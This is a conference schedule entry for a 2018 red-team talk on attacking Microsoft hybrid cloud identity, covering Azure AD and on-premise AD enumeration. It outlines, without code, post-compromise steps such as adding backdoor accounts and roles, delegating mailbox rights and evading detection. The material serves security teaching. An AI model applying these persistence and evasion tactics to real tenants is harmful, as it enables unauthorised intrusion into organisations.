Version V.1.0.0

lecture: Hybrid Cloud Seeding

Hacking Microsoft Hybrid Cloud Infrastructure


During a red team exercise, one of the prime crown jewel that the attacker targets is the Active Directory of the enterprise, which would also help in compromise of different enterprise applications (like sharepoint, exchange, etc). Tools like bloodhound and powersploit allow attackers to do amazing post exploitation enumeration and attempt to compromise the active directory. Today however, as the trust in cloud infrastructure increases, organizations are slowly moving towards a hybrid cloud infrastructure with Active Directory, Mailbox, Sharepoint Online, etc.

In this talk, we shall highlight a new approach towards red teaming in an organization that has a hybrid cloud infrastructure (Azure Hybrid cloud as recommended by Microsoft). We shall first understand the Hybrid Cloud Infrastructure (Azure AD and On-premise AD) and fedrated services and how they work. We will then look at the touch points (roles, groups, users, administrators) and learn how to extract required information using powershell from a Red Teamer perspective. We will then see how to visualize this information to attempt our final attack on such an infrastructure. And finally we shall see pivoting strategies that can be utilized in such an environment.

This talk shall have four main parts along with the following information -

Roles and Groups in Hybrid Cloud
This section highlights the points of interconnects of identities (users, groups, roles) between Azure Cloud AD and On-Premise AD
- Discuss on Federated Services
- Discuss on Roles, Groups and Delegations for users in both the environments
- Discuss on Administrative groups/ roles in both the environments
- Object ID in Azure AD

Enumeration of Cloud Environment
Here we demonstrate the Powershell commands to enumerate Azure AD. The enumeration would be of
- Tenants, domains and devices
- Users and Groups
- Administrative Roles in Azure AD

Enumerating Hybrid Cloud Environment
In this section, we demonstrate how to co-relate between Azure Cloud AD and On-Premise AD
- Azure AD Domains with On-Premise AD Domains
- Azure Users with On-Premise AD Users
- Targeting privileged Azure AD Users with compromised On-premise AD Users

Pillaging Azure Active Directory Services
Here we talk about tasks that would be done once we have access to the O365 Admin Panel. These would include –
- Pwning Azure VMs
- Adding backdoor accounts
- Adding backdoor roles
- Delegating user mailbox rights
- Why detection fails


Day: 2018-09-16
Start time: 16:45
Duration: 01:00
Room: Tesla



Click here to let us know how you liked this event.

Concurrent events